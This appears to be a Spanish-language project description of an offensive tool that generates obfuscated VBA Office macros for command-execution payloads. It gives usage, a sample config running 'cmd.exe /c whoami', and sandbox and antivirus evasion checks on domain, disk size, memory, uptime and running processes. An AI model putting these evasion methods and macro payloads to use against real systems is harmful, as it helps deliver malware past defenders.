
Genera macros VBA ofuscadas con evasión de AV/sandbox para cargas útiles de ejecución de comandos, compatibles con verificaciones de dominio, disco, memoria y procesos.
Utilidad simple diseñada para generar macros ofuscadas que también incluyen un mecanismo de evasión de AV / Sandboxes.
Python 2.7
MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r [email protected]
Usage: MMG.py [config] [output] (optional parameters)
[config] Config file that contain generator information
[output] Output filename for the macro
-l --list List of all available payloads and evasion techniques
-s --split_strings Randomly split strings at parts
-x --strings_to_hex Encode strings to hex
python MMG.py configs/generic-cmd.json malicious.vba
Ejemplo de un archivo de configuración de proyecto.
{
"description": "Generic command exec payload\nEvasion technique set to domain check",
"template": "templates/payloads/generic-cmd-evasion-template.vba",
"varcount": 150,
"encodingoffset": 4,
"chunksize": 200,
"encodedvars": {
"DOMAIN":"RINGZER0"
},
"vars": [],
"evasion": ["encoder", "domain"],
"payload": "cmd.exe /c whoami"
}
La macro obtiene la variable de entorno USERDOMAIN y compara el valor con uno predefinido. Si coinciden, se ejecuta el payload final.
La macro busca el espacio total del disco. Las máquinas virtuales y de prueba suelen usar discos pequeños.
La macro busca el tamaño total de la memoria. Las máquinas virtuales y de prueba usan menos recursos.
La macro busca el tiempo de actividad del sistema. Los sandboxes devolverán un tiempo de actividad corto.
La macro verifica si un proceso específico se está ejecutando (ejemplo outlook.exe)
El script de Python también generará código ofuscado para evitar la detección heurística.
Mr.Un1k0d3r RingZer0 Team